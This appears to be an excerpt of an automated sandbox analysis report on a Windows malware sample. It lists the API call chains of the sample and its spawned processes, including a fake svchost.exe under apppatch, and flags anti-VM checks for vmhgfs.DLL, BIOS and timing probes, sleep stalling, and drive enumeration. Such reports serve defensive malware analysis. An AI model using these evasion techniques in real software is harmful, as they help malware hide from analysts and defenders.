Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_01387020
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_0139B810
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,6_2_01399860
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_013A2320
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_013A0BE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,6_2_01383510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_013A2590
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_0139FDC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_013944F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_0139FFE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_01381670
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInform
ation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,10_2_03225890
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,10_2_03232320
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,10_2_03230BE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,10_2_03231150
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,10_2_03211180
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: CreateThread,StrStrIA,GetHandleInformation,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,CreateThread,wsprintfA,wsprintfA,wsprintfA,CreateThread,wsprintfA,10_2_0321C9F0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,10_2_032311C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,10_2_03217020
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,10_2_0322B810
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserNameA,memset,InitializeCriticalSection,StrStrIA,10_2_03229860
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,10_2_0322FFE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,10_2_03211670
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: memset,GetModuleFileNameA,InitializeCriticalSection,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,CreateMutexA,GetLastError,10_2_03213510
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,10_2_03232590
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,10_2_0322FDC0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,10_2_032244F0
Source: C:\Users\user\Desktop\WlCVLbzNph.exe Code function: 0_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date 0_2_00403900
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_00403900 RegQueryValueEx -> SystemBiosVersion/Date 2_2_00403900
Source: C:\Users\user\Desktop\WlCVLbzNph.exe Evasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcess graph_0-29899
Source: C:\Users\user\Desktop\WlCVLbzNph.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode graph_0-29931
Source: C:\Windows\apppatch\svchost.exe Check user administrative privileges: IsUserAndAdmin, DecisionNode graph_2-81088
Source: C:\Windows\apppatch\svchost.exe Stalling execution: Execution stalls by calling Sleep graph_2-80944
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\vmhgfs.DLL
Source: C:\Users\user\Desktop\WlCVLbzNph.exe File opened / queried: C:\Users\user\Desktop\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\apppatch\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLL
Source: C:\Windows\apppatch\svchost.exe File opened / queried: C:\Windows\system\vmhgfs.DLL
Source: C:\Users\user\Desktop\WlCVLbzNph.exe Code function: 0_2_00401A30 rdtsc 0_2_00401A30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02C76A30
Source: C:\Windows\apppatch\svchost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 2356
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 1003
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 1007
Source: C:\Windows\apppatch\svchost.exe Window / User API: threadDelayed 3705
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C864A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,2_2_02C864A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014264A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_014264A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_013964A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_013964A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_032264A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,10_2_032264A0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe API coverage: 2.1 %
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe API coverage: 2.2 %
Source: C:\Windows\apppatch\svchost.exe TID: 2332 Thread sleep count: 2356 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 2332 Thread sleep time: -235600s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 4824 Thread sleep count: 1003 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 4824 Thread sleep time: -100300s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 3636 Thread sleep count: 1007 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 3636 Thread sleep time: -100700s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 2332 Thread sleep count: 3705 > 30
Source: C:\Windows\apppatch\svchost.exe TID: 2332 Thread sleep time: -370500s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 2848 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\apppatch\svchost.exe TID: 3232 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C766D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,2_2_02C766D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C97CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,2_2_02C97CE0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BBE9
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8BB20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D0C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C8D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,SetErrorMode,2_2_02C8D189
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,2_2_02C9BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142D189
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142D0C0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142BB20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0142BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,5_2_0142BBE9
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_01437CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_01437CE0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0143BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,5_2_0143BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_014166D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_014166D0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0139D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,6_2_0139D189
